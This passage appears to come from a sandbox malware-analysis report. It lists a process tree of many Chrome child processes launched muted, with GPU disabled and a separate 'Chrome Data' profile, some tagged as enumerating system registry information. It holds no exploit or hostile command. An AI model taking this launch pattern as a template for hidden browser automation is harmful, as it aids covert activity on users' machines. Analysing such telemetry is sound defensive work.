      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4020 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5480
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4228 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5320
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4076 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6176
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3912 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6336
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4112 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6540
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4176 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4228 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3884 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6652
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4516 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:3688
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4636 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1816
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4676 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:7060
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5076 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6576
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5152 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6708
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5248 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:2132
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5372 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5036
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5384 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6072
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5620 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:7096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5796 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:3560
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5868 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6344
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4452 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6224
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5948 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5584
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5408 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5404 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:6844
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5216 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:3904
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5540 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5040
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4584 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:3976
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4584 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:4840
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4888 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:4812
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:2168
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:892
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1200 --field-trial-handle=1288,i,5366325520126593986,8368804391005570503,131072 /prefetch:2
      4⤵
      PID:640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1440 --field-trial-handle=1288,i,5366325520126593986,8368804391005570503,131072 /prefetch:8
      4⤵
      PID:2452
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:1704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1224
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1124 --field-trial-handle=1412,i,7767998952674824840,5552250150978945752,131072 /prefetch:2
      4⤵
      PID:908
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1332 --field-trial-handle=1412,i,7767998952674824840,5552250150978945752,131072 /prefetch:8
      4⤵
      PID:2892
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:696
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:2672
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1148 --field-trial-handle=1288,i,8723370307337890985,12337188718493804590,131072 /prefetch:2
      4⤵
      PID:6680
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1404 --field-trial-handle=1288,i,8723370307337890985,12337188718493804590,131072 /prefetch:8
      4⤵
      PID:6756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:2800
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1148 --field-trial-handle=1276,i,3246257165817504912,5723733089623705396,131072 /prefetch:2
      4⤵
      PID:4716
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1468 --field-trial-handle=1276,i,3246257165817504912,5723733089623705396,131072 /prefetch:8
      4⤵
      PID:4860
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:2488
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1184 --field-trial-handle=1200,i,2822437832975619618,6264530820789178646,131072 /prefetch:2
      4⤵
      PID:5512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1420 --field-trial-handle=1200,i,2822437832975619618,6264530820789178646,131072 /prefetch:8
      4⤵
      PID:3560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    PID:2508
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1964
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1132 --field-trial-handle=1292,i,7658741544274679179,7879479679264970856,131072 /prefetch:2
      4⤵
      PID:4664
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1456 --field-trial-handle=1292,i,7658741544274679179,7879479679264970856,131072 /prefetch:8
      4⤵
      PID:5728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:892
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1224
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1184 --field-trial-handle=1220,i,15253629691820867745,6251023869766001222,131072 /prefetch:2
      4⤵
      PID:4676
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1424 --field-trial-handle=1220,i,15253629691820867745,6251023869766001222,131072 /prefetch:8
      4⤵
      PID:4852
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:1820
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1076
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
